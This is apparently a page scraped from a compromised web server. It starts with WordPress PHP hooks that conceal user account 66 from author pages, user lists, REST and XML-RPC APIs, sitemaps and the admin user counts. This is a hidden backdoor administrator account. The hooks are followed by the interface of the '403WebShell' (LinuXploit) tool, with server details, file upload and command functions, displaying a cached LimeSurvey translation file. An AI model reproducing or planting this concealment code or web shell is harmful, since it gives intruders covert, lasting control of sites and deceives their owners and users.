add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/limesurvey/tmp/runtime/cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/limesurvey/tmp/runtime/cache/eaa2a2c5661bf71c0cdf9642b041cea2.bin
a:2:{i:0;s:4190:"a:47:{s:0:"";s:254:"PO-Revision-Date: 2025-02-25 15:09:27+0000
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Plural-Forms: nplurals=2; plural=n != 1;
X-Generator: GlotPress/4.0.1
Language: en_US
Project-Id-Version: LimeSurvey 6.x
";s:29:"(Iconv Library not installed)";s:29:"(Iconv library not installed)";s:15:"Activate Survey";s:15:"Activate survey";s:23:"Back to Response Import";s:23:"Back to response import";s:33:"Chinese (Traditional - Hong Kong)";s:32:"Chinese (Traditional; Hong Kong)";s:30:"Chinese (Traditional - Taiwan)";s:29:"Chinese (Traditional; Taiwan)";s:11:"Delete User";s:11:"Delete user";s:12:"Did Not Save";s:12:"Did not save";s:65:"Directory with the name `%s` already exists - choose another name";s:64:"Directory with the name `%s` already exists; choose another name";s:37:"Each answer must be between %s and %s";s:37:"Your answer must be between %s and %s";s:10:"Edit Group";s:10:"Edit group";s:16:"Error Files List";s:16:"Error files list";s:19:"Forbidden Extension";s:19:"Forbidden extension";s:14:"Group by Group";s:14:"Group by group";s:27:"IP Addresses will be logged";s:27:"IP addresses will be logged";s:16:"Import Label Set";s:16:"Import label set";s:19:"Imported Files List";s:19:"Imported files list";s:15:"List (Dropdown)";s:15:"List (dropdown)";s:12:"List (Radio)";s:12:"List (radio)";s:19:"Mail to all Members";s:19:"Mail to all members";s:17:"Main Admin Screen";s:17:"Main admin screen";s:125:"Makes this question mandatory in your survey. Option "Soft" gives a possibility to skip a question without giving any answer.";s:105:"Makes this question mandatory in your survey. Option "Soft" gives a possibility to hide the asterisk (*).";s:18:"Mandatory Question";s:18:"Mandatory question";s:18:"Maximum characters";s:14:"Max characters";s:56:"No GID (Group) has been provided. Cannot import question";s:56:"No GID (group) has been provided. Cannot import question";s:58:"No SID (Survey) has been provided. Cannot import question.";s:58:"No SID (survey) has been provided. Cannot import question.";s:12:"Not Selected";s:12:"Not selected";s:107:"One or more mandatory questions have not been answered. You cannot proceed until these have been completed.";s:106:"One or more required questions have not been answered. You cannot proceed until these have been completed.";s:13:"Online Manual";s:13:"Online manual";s:17:"Optional Question";s:17:"Optional question";s:92:"Please notice you haven't answered this question. Still, you can continue without answering.";s:89:"Please note that you have not answered this question. You may continue without answering.";s:20:"Question by Question";s:20:"Question by question";s:238:"Question could not be updated. There are conditions for other questions that rely on the answers to this question and changing the type will cause problems. You must delete these conditions before you can change the type of this question.";s:232:"Question could not be updated. There are conditions for other questions that rely on the answers to this question and changing the type will cause problems. Please delete these conditions before you change the type of this question.";s:14:"Record Deleted";s:14:"Record deleted";s:15:"Reminder Email:";s:15:"Reminder email:";s:24:"Resources Import Summary";s:24:"Resources import summary";s:8:"Save Now";s:8:"Save now";s:20:"Saved Survey Details";s:20:"Saved survey details";s:14:"Send Reminders";s:14:"Send reminders";s:33:"Support this project - Donate to ";s:32:"Support this project: Donate to ";s:66:"This ZIP archive contains no valid Resources files. Import failed.";s:66:"This ZIP archive contains no valid resources files. Import failed.";s:81:"This name has already been used for this survey. You must use a unique save name.";s:79:"This name has already been used for this survey. Please use a unique save name.";s:12:"Total Errors";s:12:"Total errors";s:20:"Total Imported files";s:20:"Total imported files";s:20:"Uploading LDAP Query";s:20:"Uploading LDAP query";s:18:"Yes - Delete Them!";s:17:"Yes, delete them!";s:50:"You must supply a password for this saved session.";s:48:"Please supply a password for this saved session.";}";i:1;N;}

Youez - 2016 - github.com/yon3zu
LinuXploit